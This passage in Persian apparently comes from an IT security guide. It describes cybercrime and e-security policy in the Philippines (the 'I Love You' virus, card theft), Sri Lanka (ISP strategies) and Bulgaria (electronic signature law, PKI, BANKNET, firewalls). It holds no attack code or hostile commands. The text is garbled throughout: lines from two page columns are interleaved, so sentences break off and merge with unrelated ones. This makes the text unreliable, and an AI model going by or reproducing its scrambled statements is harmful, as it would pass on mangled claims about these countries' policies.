‫ﻭ ﻣﻘﺎﻣﺎﺕ ﺩﻭﻟﺘﻲ ﻫﺪﺍﻳﺖ ﻣﻲ ﺷﻮﺩ‪ .‬ﻳﻜـﻲ ﺍﺯ ﭘﺮﺳـﺸﻬﺎﻱ ﺍﺻـﻠﻲ‬
‫ﺟﻬﺖ ﺍﻓﺰﺍﻳﺶ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﺑﭙﺮﺩﺍﺯﻧﺪ‪.‬‬
‫ﺳﻨﮕﺎﭘﻮﺭ ﻛﻪ ﺩﺍﺭﺍﻱ ﺗﻨﻬـﺎ ﻳـﻚ ﻧﻬـﺎﺩ ﺑـﺮﺍﻱ ﺗـﺪﻭﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﻫﻤﺎﻧﻨﺪ ﺳﺎﻳﺮ ﻧﻘﺎﻁ ﺟﻬﺎﻥ‪ ،‬ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻢ ﻫﻨﻮﺯ‬ ‫ﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ‬ ‫ﻣﻲﺑﺎﺷﺪ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﭼﮕﻮﻧﻪ ﺩﻭﻟﺘﻲ ﺑﻪ ﺑﺰﺭﮔ ﹺ‬
‫ﺩﺭ ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﻪ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﻓﻴﻠﻴﭙـﻴﻦ ﺩﺭ ﺍﻳـﻦ ﺭﺍﺳـﺘﺎ ﺑـﻪ‬ ‫ﺑﺎ ﺩﺍﺷﺘﻦ ﻣﺮﺍﺟﻊ ﻣﺘﻌﺪﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺿﻮﺍﺑﻂ ﺧﻮﺩ ﺭﺍ‬
‫ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﻫﺸﺖ ﺭﻛﻦ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺮﺍﻱ‬ ‫ﺑﺼﻮﺭﺕ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻋﻤﺎﻝ ﻛﻨﺪ‪.‬‬
‫ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺰ ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ‪ :‬ﭘﻴﻮﻧﺪ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑـﺎ‬
‫ﺭﻭﺷﻬﺎﻱ ﺍﻋﻤﺎﻝ ﺿـﻮﺍﺑﻂ‪ ،‬ﺑﺮﻗـﺮﺍﺭﻱ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ ﺩﻭﻟـﺖ ﻭ‬ ‫ﻓﻴﻠﻴﭙﻴﻦ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﻧﻴﺰ ﺑﻬﺒﻮﺩ ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻱ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ‬
‫ﺑﺤﺚ ﻓﻴﻠﻴﭙﻴﻦ ﺭﻭﻱ ﻧﺘﺎﻳﺞ ﺳﻪ ﻧﮕـﺮﺵ ﻣﻤﻜـﻦ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺭﺷـﺪ‬
‫ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‪ .‬ﺑﺎ ﺍﻳﻨﻬﻤﻪ ﻓﻴﻠﻴﭙﻴﻦ ﻫﻨـﻮﺯ ﻧﻴﺎﺯﻣﻨـﺪ‬
‫ﻓﺰﺍﻳﻨﺪﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﺳـﻪ ﻧﮕـﺮﺵ‬
‫ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﺧﺒــﺮﺓ ﻗــﺎﻧﻮﻧﻲ‪ ،‬ﺑﺨــﺼﻮﺹ ﺑــﺮﺍﻱ ﺩﺍﺩﮔﺎﻫﻬــﺎﻱ‬
‫ﻋﺒﺎﺭﺕ ﺑﻮﺩﻧﺪ ﺍﺯ ﮔﺴﺘﺮﺵ ﻭﻳﺮﻭﺳﻬﺎ )ﻣﺜـﻞ ﻭﻳـﺮﻭﺱ ‪،(I Love You‬‬
‫ﺗﺨﺼﺼﻲ ﺍﺳﺖ‪ .‬ﺍﺯ ﺩﻳﮕﺮ ﻧﻴﺎﺯﻫـﺎﻱ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ‬
‫ﺳﺮﻗﺖ ﻣﺪﺍﻭﻡ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ‪ ،‬ﻭ ﻧﻴﺰ ﺣﺎﺩﺛﺔ ﻳﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ‪.‬‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺁﻣﻮﺯﺵ ﻛﻠﻴﺔ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ‬
‫ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻛـﺸﻮﺭ ﻓﻴﻠﻴﭙـﻴﻦ ﺍﺯ ﺣﺎﺩﺛـﺔ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑـﺮﺍﻱ‬
‫ﻣﺎﻟﻲ ﺷﺎﻣﻞ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﺷـﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ‬
‫ﺗﺸﺮﻳﺢ ﻣﺤﺎﺳﺒﺎﺕ ﺩﻭﻟﺖ ﺧﻮﺩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﻲ‬
‫ﺧﺪﻣﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫ﺍﻗﺘﺼﺎﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻧﺪ‪.‬‬
‫ﻓﻴﻠﻴﭙﻴﻨﻲ ﻫﺎ ﺩﻭ ﺳﺆﺍﻝ ﻋﻤﺪﻩ ﻣﻄﺮﺡ ﻛﺮﺩﻧـﺪ‪ (۱ :‬ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ‬
‫ﺩﺭ ﻓﻴﻠﻴﭙــﻴﻦ‪ ،‬ﮔــﺴﺘﺮﺵ ﻭﻳــﺮﻭﺱ "‪ "I Love You‬ﺑــﺴﺮﻋﺖ‬
‫ﭼﮕﻮﻧﻪ ﻣﻴﺎﻥ ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩﻫﺎ ﻭ ﺣﻔﻆ ﻣﺴﺎﺋﻞ ﻣﺤﺮﻣﺎﻧﻪ‪ ،‬ﺗـﻮﺍﺯﻥ‬
‫ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑـﻪ ﻭﺍﻛـﻨﺶ ﻭﺍﺩﺍﺭ ﻛـﺮﺩ‪ .‬ﺍﻳـﻦ ﺣﺎﺩﺛـﻪ ﺍﺯ ﺁﻥ‬
‫ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ؟ ﻭ ‪ (۲‬ﺟﺎﻳﮕﺎﻩ ﭘﻠـﻴﺲ ﺑـﻴﻦﺍﻟﻤﻠـﻞ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺟﻬــﺖ ﻛــﻪ ﺿــﻌﻔﻬﺎﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﺭﺍ ﻓــﺎﺵ‬
‫ﺟﺮﺍﺋﻢ ﺟﺰﺍﻳﻲ ﭼﻴﺴﺖ؟‬
‫ﻣــﻲﺳــﺎﺧﺖ ﺍﺯ ﺍﻫﻤﻴــﺖ ﻭﻳــﮋﻩﺍﻱ ﺑﺮﺧــﻮﺭﺩﺍﺭ ﺑــﻮﺩ‪ .‬ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ‬

‫‪234 Cyber-Strategy‬‬ ‫‪233 Licensed Certificate Authorities‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٢٠‬‬

‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺭﺍ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﻣﻲﺩﺍﻧﻨﺪ‪ .‬ﺗﻐﻴﻴﺮﺍﺕ ﻧﻈﺎﺭﺗﻲ‬ ‫ﺳﺮﻳﻼﻧﻜﺎ‬


‫ﻭ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷﺎﻣﻞ ﺁﻣﻮﺯﺵ ‪ -‬ﻳﻜﻲ ﺍﺯ ﺍﺟـﺰﺍﻱ ﻣﻬـﻢ‬
‫ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺳﺮﻳﻼﻧﻜﺎ ﺻﺤﺒﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺭﺍﺋﻪ ﭘـﻴﺶﺯﻣﻴﻨـﻪﺍﻱ ﺍﺯ‬
‫ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ‪ -‬ﻧﻴﺰ ﻣﻲﺷـﻮﺩ‪ .‬ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ ﺍﺷـﺎﺭﻩ‬
‫ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺑﺤـﺚ ﺩﺭﺑـﺎﺭﺓ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ ﮔـﺴﺘﺮﺵ‬
‫ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺭﻭﻱ ﻣﺒﺎﻧﻲ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ ﺍﻳﻦ ﻣﺴﺌﻠﻪ )ﻣﺸﺘﻤﻞ‬
‫ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ‪ .‬ﺁﻧﻬﺎ ﻋﻘﻴﺪﻩ ﺩﺍﺷـﺘﻨﺪ‬
‫ﺑﺮ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻓﻨﻲ ﻣﻴﺎﻥ ﻣﺸﺘﺮﻛﺎﻥ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ( ﻫﻤﭽﻨـﺎﻥ ﻛـﺎﺭ‬
‫ﻛﻪ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﻪ ﺯﻭﺩﻱ ﺣﻞ ﺧﻮﺍﻫﻨﺪ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﺷﺪ ﻭ ﻣﺸﻜﻞ ﻋﺪﻡ ﺁﮔﺎﻫﻲ ﻧﻴﺰ ﺑﻴﺸﺘﺮ ﺩﺭ ﺳﻄﺢ ﻣـﺪﻳﺮﻳﺖ ﻭﺟـﻮﺩ‬
‫ﺩﺭ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺍﻱ ﺍﻣـﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬ ‫ﺩﺍﺭﺩ ﻭ ﺑﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺟﻠـﺐ ﺣﻤﺎﻳـﺖ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻳﻲ ﻣﺜـﻞ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺷﺎﻣﻞ ﻗﺎﻧﻮﻥ ﺳﻨﺪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺗﻨﻈﻴﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ‬ ‫ﮔﺴﺘﺮﺵ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﻧﻘﻄﻪﺿﻌﻒ ﺩﻳﮕﺮﻱ ﻛـﻪ‬
‫ﻗﺎﻧﻮﻧﻲ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﻭ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎﻱ ﭘﻴـﺸﺮﻓﺘﺔ ﺍﻣـﻀﺎﻱ‬ ‫ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺩﺭ ﻣﻴﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎﻓـﺖ‪ ،‬ﻋـﺪﻡ ﺁﮔـﺎﻫﻲ ﺍﺯ ﻧﺤـﻮﺓ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎﻧﻜﻬﺎ ﻣﺎﻳﻞ ﺑﻪ ﺍﻳﺠﺎﺩ ‪PKI‬‬ ‫ﺍﻧﺠﺎﻡ ﻳﻚ ﻣﻌﺎﻣﻠﺔ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﻋﺘﻤـﺎﺩ ﻣﻴـﺎﻥ‬
‫ﺹ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ‪،‬‬ ‫ﻫﺴﺘﻨﺪ‪ .‬ﺑﺎﻧﻜﻬﺎ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺧﺎ ﹺ‬ ‫ﻣﺸﺘﺮﻳﺎﻥ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻛﻤﺘﺮ ﻣﺎﻳﻞ ﺑـﻪ ﺷـﺮﻛﺖ ﺩﺭ ﻣﻌـﺎﻣﻼﺕ‬
‫ﻧﻘﺶ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻧﻴـﺎﺯ ﺑـﻪ‬ ‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﺠﺎﺩ ﻭ ﺍﺭﺍﺋﻪ ﺧﻂﻣﺸﻲﻫﺎ ﻭ ﻣﺒﺎﻧﻲ ﻛﺎﺭﻱ ﺑـﻪ‬
‫ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮﻱ ﺩﺭﻭﻧﻲ ﻭ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳـﺎﺯﮔﺎﺭ ﺑـﻴﻦ‬ ‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ ﺩﺭ ﻣـﺸﺘﺮﻳﺎﻥ‬
‫ﺑﺎﻧﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺩﺭ ﺯﻣﻴﻨﺔ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻧﻴـﺰ‬ ‫ﻫﻢ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬
‫ﻳﻚ ﻣﻼﺣﻈﺔ ﺧﺎﺹ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﻋﻼﻭﻩ ﺑﺮ ﺗﻌﺮﻳﻒ ﻧﻴﺎﺯﻫﺎﻱ‬
‫ﭘﺮﺳﺶ ﺳﺮﻳﻼﻧﻜﺎ ﻣﺘﻮﺟﻪ ﻓﺮﺍﻫﻢﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑـﻮﺩ‪.‬‬
‫ﺗﺠﺎﺭﻱ ﺑﺎﻳﺪ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﻧﻴﺰ ﺗﻌﺮﻳﻒ ﻛﻨﺪ‪ .‬ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻭ‬
‫ﺁﻧﻬﺎ ﻣﻲﺧﻮﺍﺳﺘﻨﺪ ﺑﺪﺍﻧﻨﺪ ﻛـﻪ ﺁﻳـﺎ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ﺭﺳـﻤﻲ ﻭ ﻣﺒـﺎﻧﻲ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻋﻤﻮﻣﻲ ﺍﺯ ﻣﻔﻬﻮﻡ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻛﺎﺭﻱ ﺑﺮﺍﻱ ‪ISP‬ﻫﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫـﺪ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﻋﻮﺍﻣﻞ ﻛﻠﻴﺪﻱ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧـﺖ‬
‫ﺩﺍﺷﺖ ﻳﺎ ﺧﻴﺮ‪ .‬ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺧﻮﺍﺳﺘﺎﺭ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ‬
‫ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﻩ‪ ،‬ﻗﺎﺑﻠﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ‪ ،‬ﻭ ﻗﻴﻤـﺖ‪.‬‬
‫ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻛﺮﻩ ﺷﺪﻧﺪ ‪ -‬ﺍﻳﻨﻜـﻪ ﺁﻳـﺎ ﺧـﺼﻮﺻﻲ ﻳـﺎ ﺩﻭﻟﺘـﻲ‬
‫ﺧﺪﻣﺎﺕ ﺑﺎﻧﻜﻲ ﺩﺭ ﻳﻚ ﻣﻨﻄﻘﺔ ﺣﻔﺎﻇﺖﺷـﺪﻩ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺍﺳﺖ‪ ،‬ﻭ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﻘﺸﻬﺎﻳﻲ ﺭﺍ ﺗﺤﺖ ﭘﻮﺷﺶ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺷـﺎﻣﻞ ﻭﺟـﻮﺩ ‪ gateway‬ﺧـﺎﺹ ﺑـﺮﺍﻱ ﻫـﺮ ﺑﺮﻧﺎﻣـﺔ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺍﺳـﺖ‪ .‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺑـﺴﺘﺔ‬ ‫ﺑﻠﻐﺎﺭﺳﺘﺎﻥ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ‪ BANKNET‬ﻗﺎﺑﻠﻴﺖ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺑﺎﻧﻜﻬﺎ ﺍﺯ ﻃﺮﻳﻖ‬
‫ﺧﺪﻣﺎﺕ ﻧﻮﻳﻦ ﺑـﺎﻧﻜﻲ ﺑﻠﻐﺎﺭﺳـﺘﺎﻥ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۸۹‬ﺑـﺎ ﻓﺮﻫﻨﮕـﻲ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺕ ﻋﻠﻴﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ‬
‫ﻣﺸﺎﺑﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺍﺭﻭﭘﺎ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺪ‪ .‬ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺷﺎﻣﻞ‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﺍﻧﺠـﺎﻡ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﻭ ﺑﺴﺘﻪﻫﺎﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ ﺻـﻨﻌﺖ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻣﻴـﺴﺮ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺑﻮﺩ )ﺑﺮﺍﻱ ﻣﺜـﺎﻝ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ‪ BANKNET‬ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ(‪.‬‬
‫ﺍﺳﺖ‪ .‬ﺍﻣﺎ ﺩﺭ ﭘﺸﺖ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪ ،‬ﺳﻄﺢ ﻣﻨﺎﺳـﺒﻲ ﺍﺯ ﺍﻣﻨﻴـﺖ‬
‫ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺎ ﺳﺆﺍﻻﺕ ﺍﺳﺎﺳـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺑﺎﻧﻜﻲ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺑﻴﻦ ﺑـﺎﻧﻜﻲ ﺗـﺄﻣﻴﻦ‬
‫ﺍﻳﻨﻜﻪ "ﭼﻪ ﭼﻴﺰﻱ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﺷﻮﺩ" ﺁﻏﺎﺯ ﻛﺮﺩ‪ ،‬ﻭ ﺳﭙﺲ ﻋﻨﺎﺻﺮ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺣﻴــﺎﺗﻲ ﺍﻳﻨﻜــﺎﺭ ‪ -‬ﻣﺜــﻞ ﺷــﺒﻜﻪﻫــﺎﻱ ﻓﻴﺰﻳﻜــﻲ‪ ،‬ﺳﻴــﺴﺘﻤﻬﺎﻱ‬
‫ﺩﺭ ﺑﻠﻐﺎﺭﺳﺘﺎﻥ ﻳـﺎ ﻫـﺮ ﺟـﺎﻱ ﺩﻳﮕـﺮ‪ ،‬ﺑﺎﻧﻜﻬـﺎﻱ ﻣﺮﻛـﺰﻱ ﺑـﺮﺍﻱ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺩﺍﺧﻠﻲ‪ ،‬ﻭ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﺎﺭﭼﻮﺑﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺗـﺼﻮﻳﺐ‬ ‫)ﻋﻠﻲﺍﻟﺨﺼﻮﺹ ﺩﺍﺩﻩﻫﺎﻱ ﺗﺒﺎﺩﻟﻲ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﻭ ﻣـﺸﺘﺮﻳﺎﻥ( ‪ -‬ﺭﺍ ﻣﻌﺮﻓـﻲ‬
‫ﻻ ﺷﺎﻣﻞ ﺭﻭﺷﻬﺎﻱ ﺟﺪﻳﺪ ﭘﺮﺩﺍﺧـﺖ‬ ‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﭼﺎﺭﭼﻮﺑﻬﺎ ﻣﻌﻤﻮ ﹰ‬ ‫ﻧﻤﻮﺩ‪.‬‬
‫ﻭ ﻗﻮﺍﻧﻴﻦ ﺣﺎﻛﻢ ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻠﻲ ﭘﺮﺩﺍﺧـﺖ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﺯ ﺍﻳـﻦ‬
‫ﺍﺯ ﺑﻌﺪ ﺳﺎﺯﻣﺎﻧﻲ‪ ،‬ﺑﻠﻐﺎﺭﺳـﺘﺎﻥ ﻳـﻚ ﻛﻤﻴﺘـﺔ ﺩﺍﺧﻠـﻲ ﺩﺍﺷـﺖ ﻛـﻪ‬
‫ﻃﺮﻳﻖ‪ ،‬ﻣﺒﺎﻧﻲ ﻗﺎﻧﻮﻧﻲ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻠﻲ ﭘﺮﺩﺍﺧـﺖ‬
‫ﻣﺴﺌﻮﻝ ﺗﺤﻠﻴﻞ ﻭ ﺍﺭﺍﺋﻪ ﺭﺍﻫﻜﺎﺭﻫﺎ ﺑﻮﺩ‪ .‬ﺗـﺪﻭﻳﻦ ﺧـﻂﻣـﺸﻲﻫـﺎﻱ‬
‫ﺍﺯ ﺟﻤﻠﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﻣﺮﻛﺰﻱ ﻭ ﻧﻴﺰ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﺭﺗﻲ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺎﺯﻣﻨﺪ ﻧﻈﺎﺭﺕ ﺑـﺮ ﺷـﺒﻜﻪﻫـﺎﻱ ﺍﺭﺗﺒـﺎﻃﻲ ﻭ‬
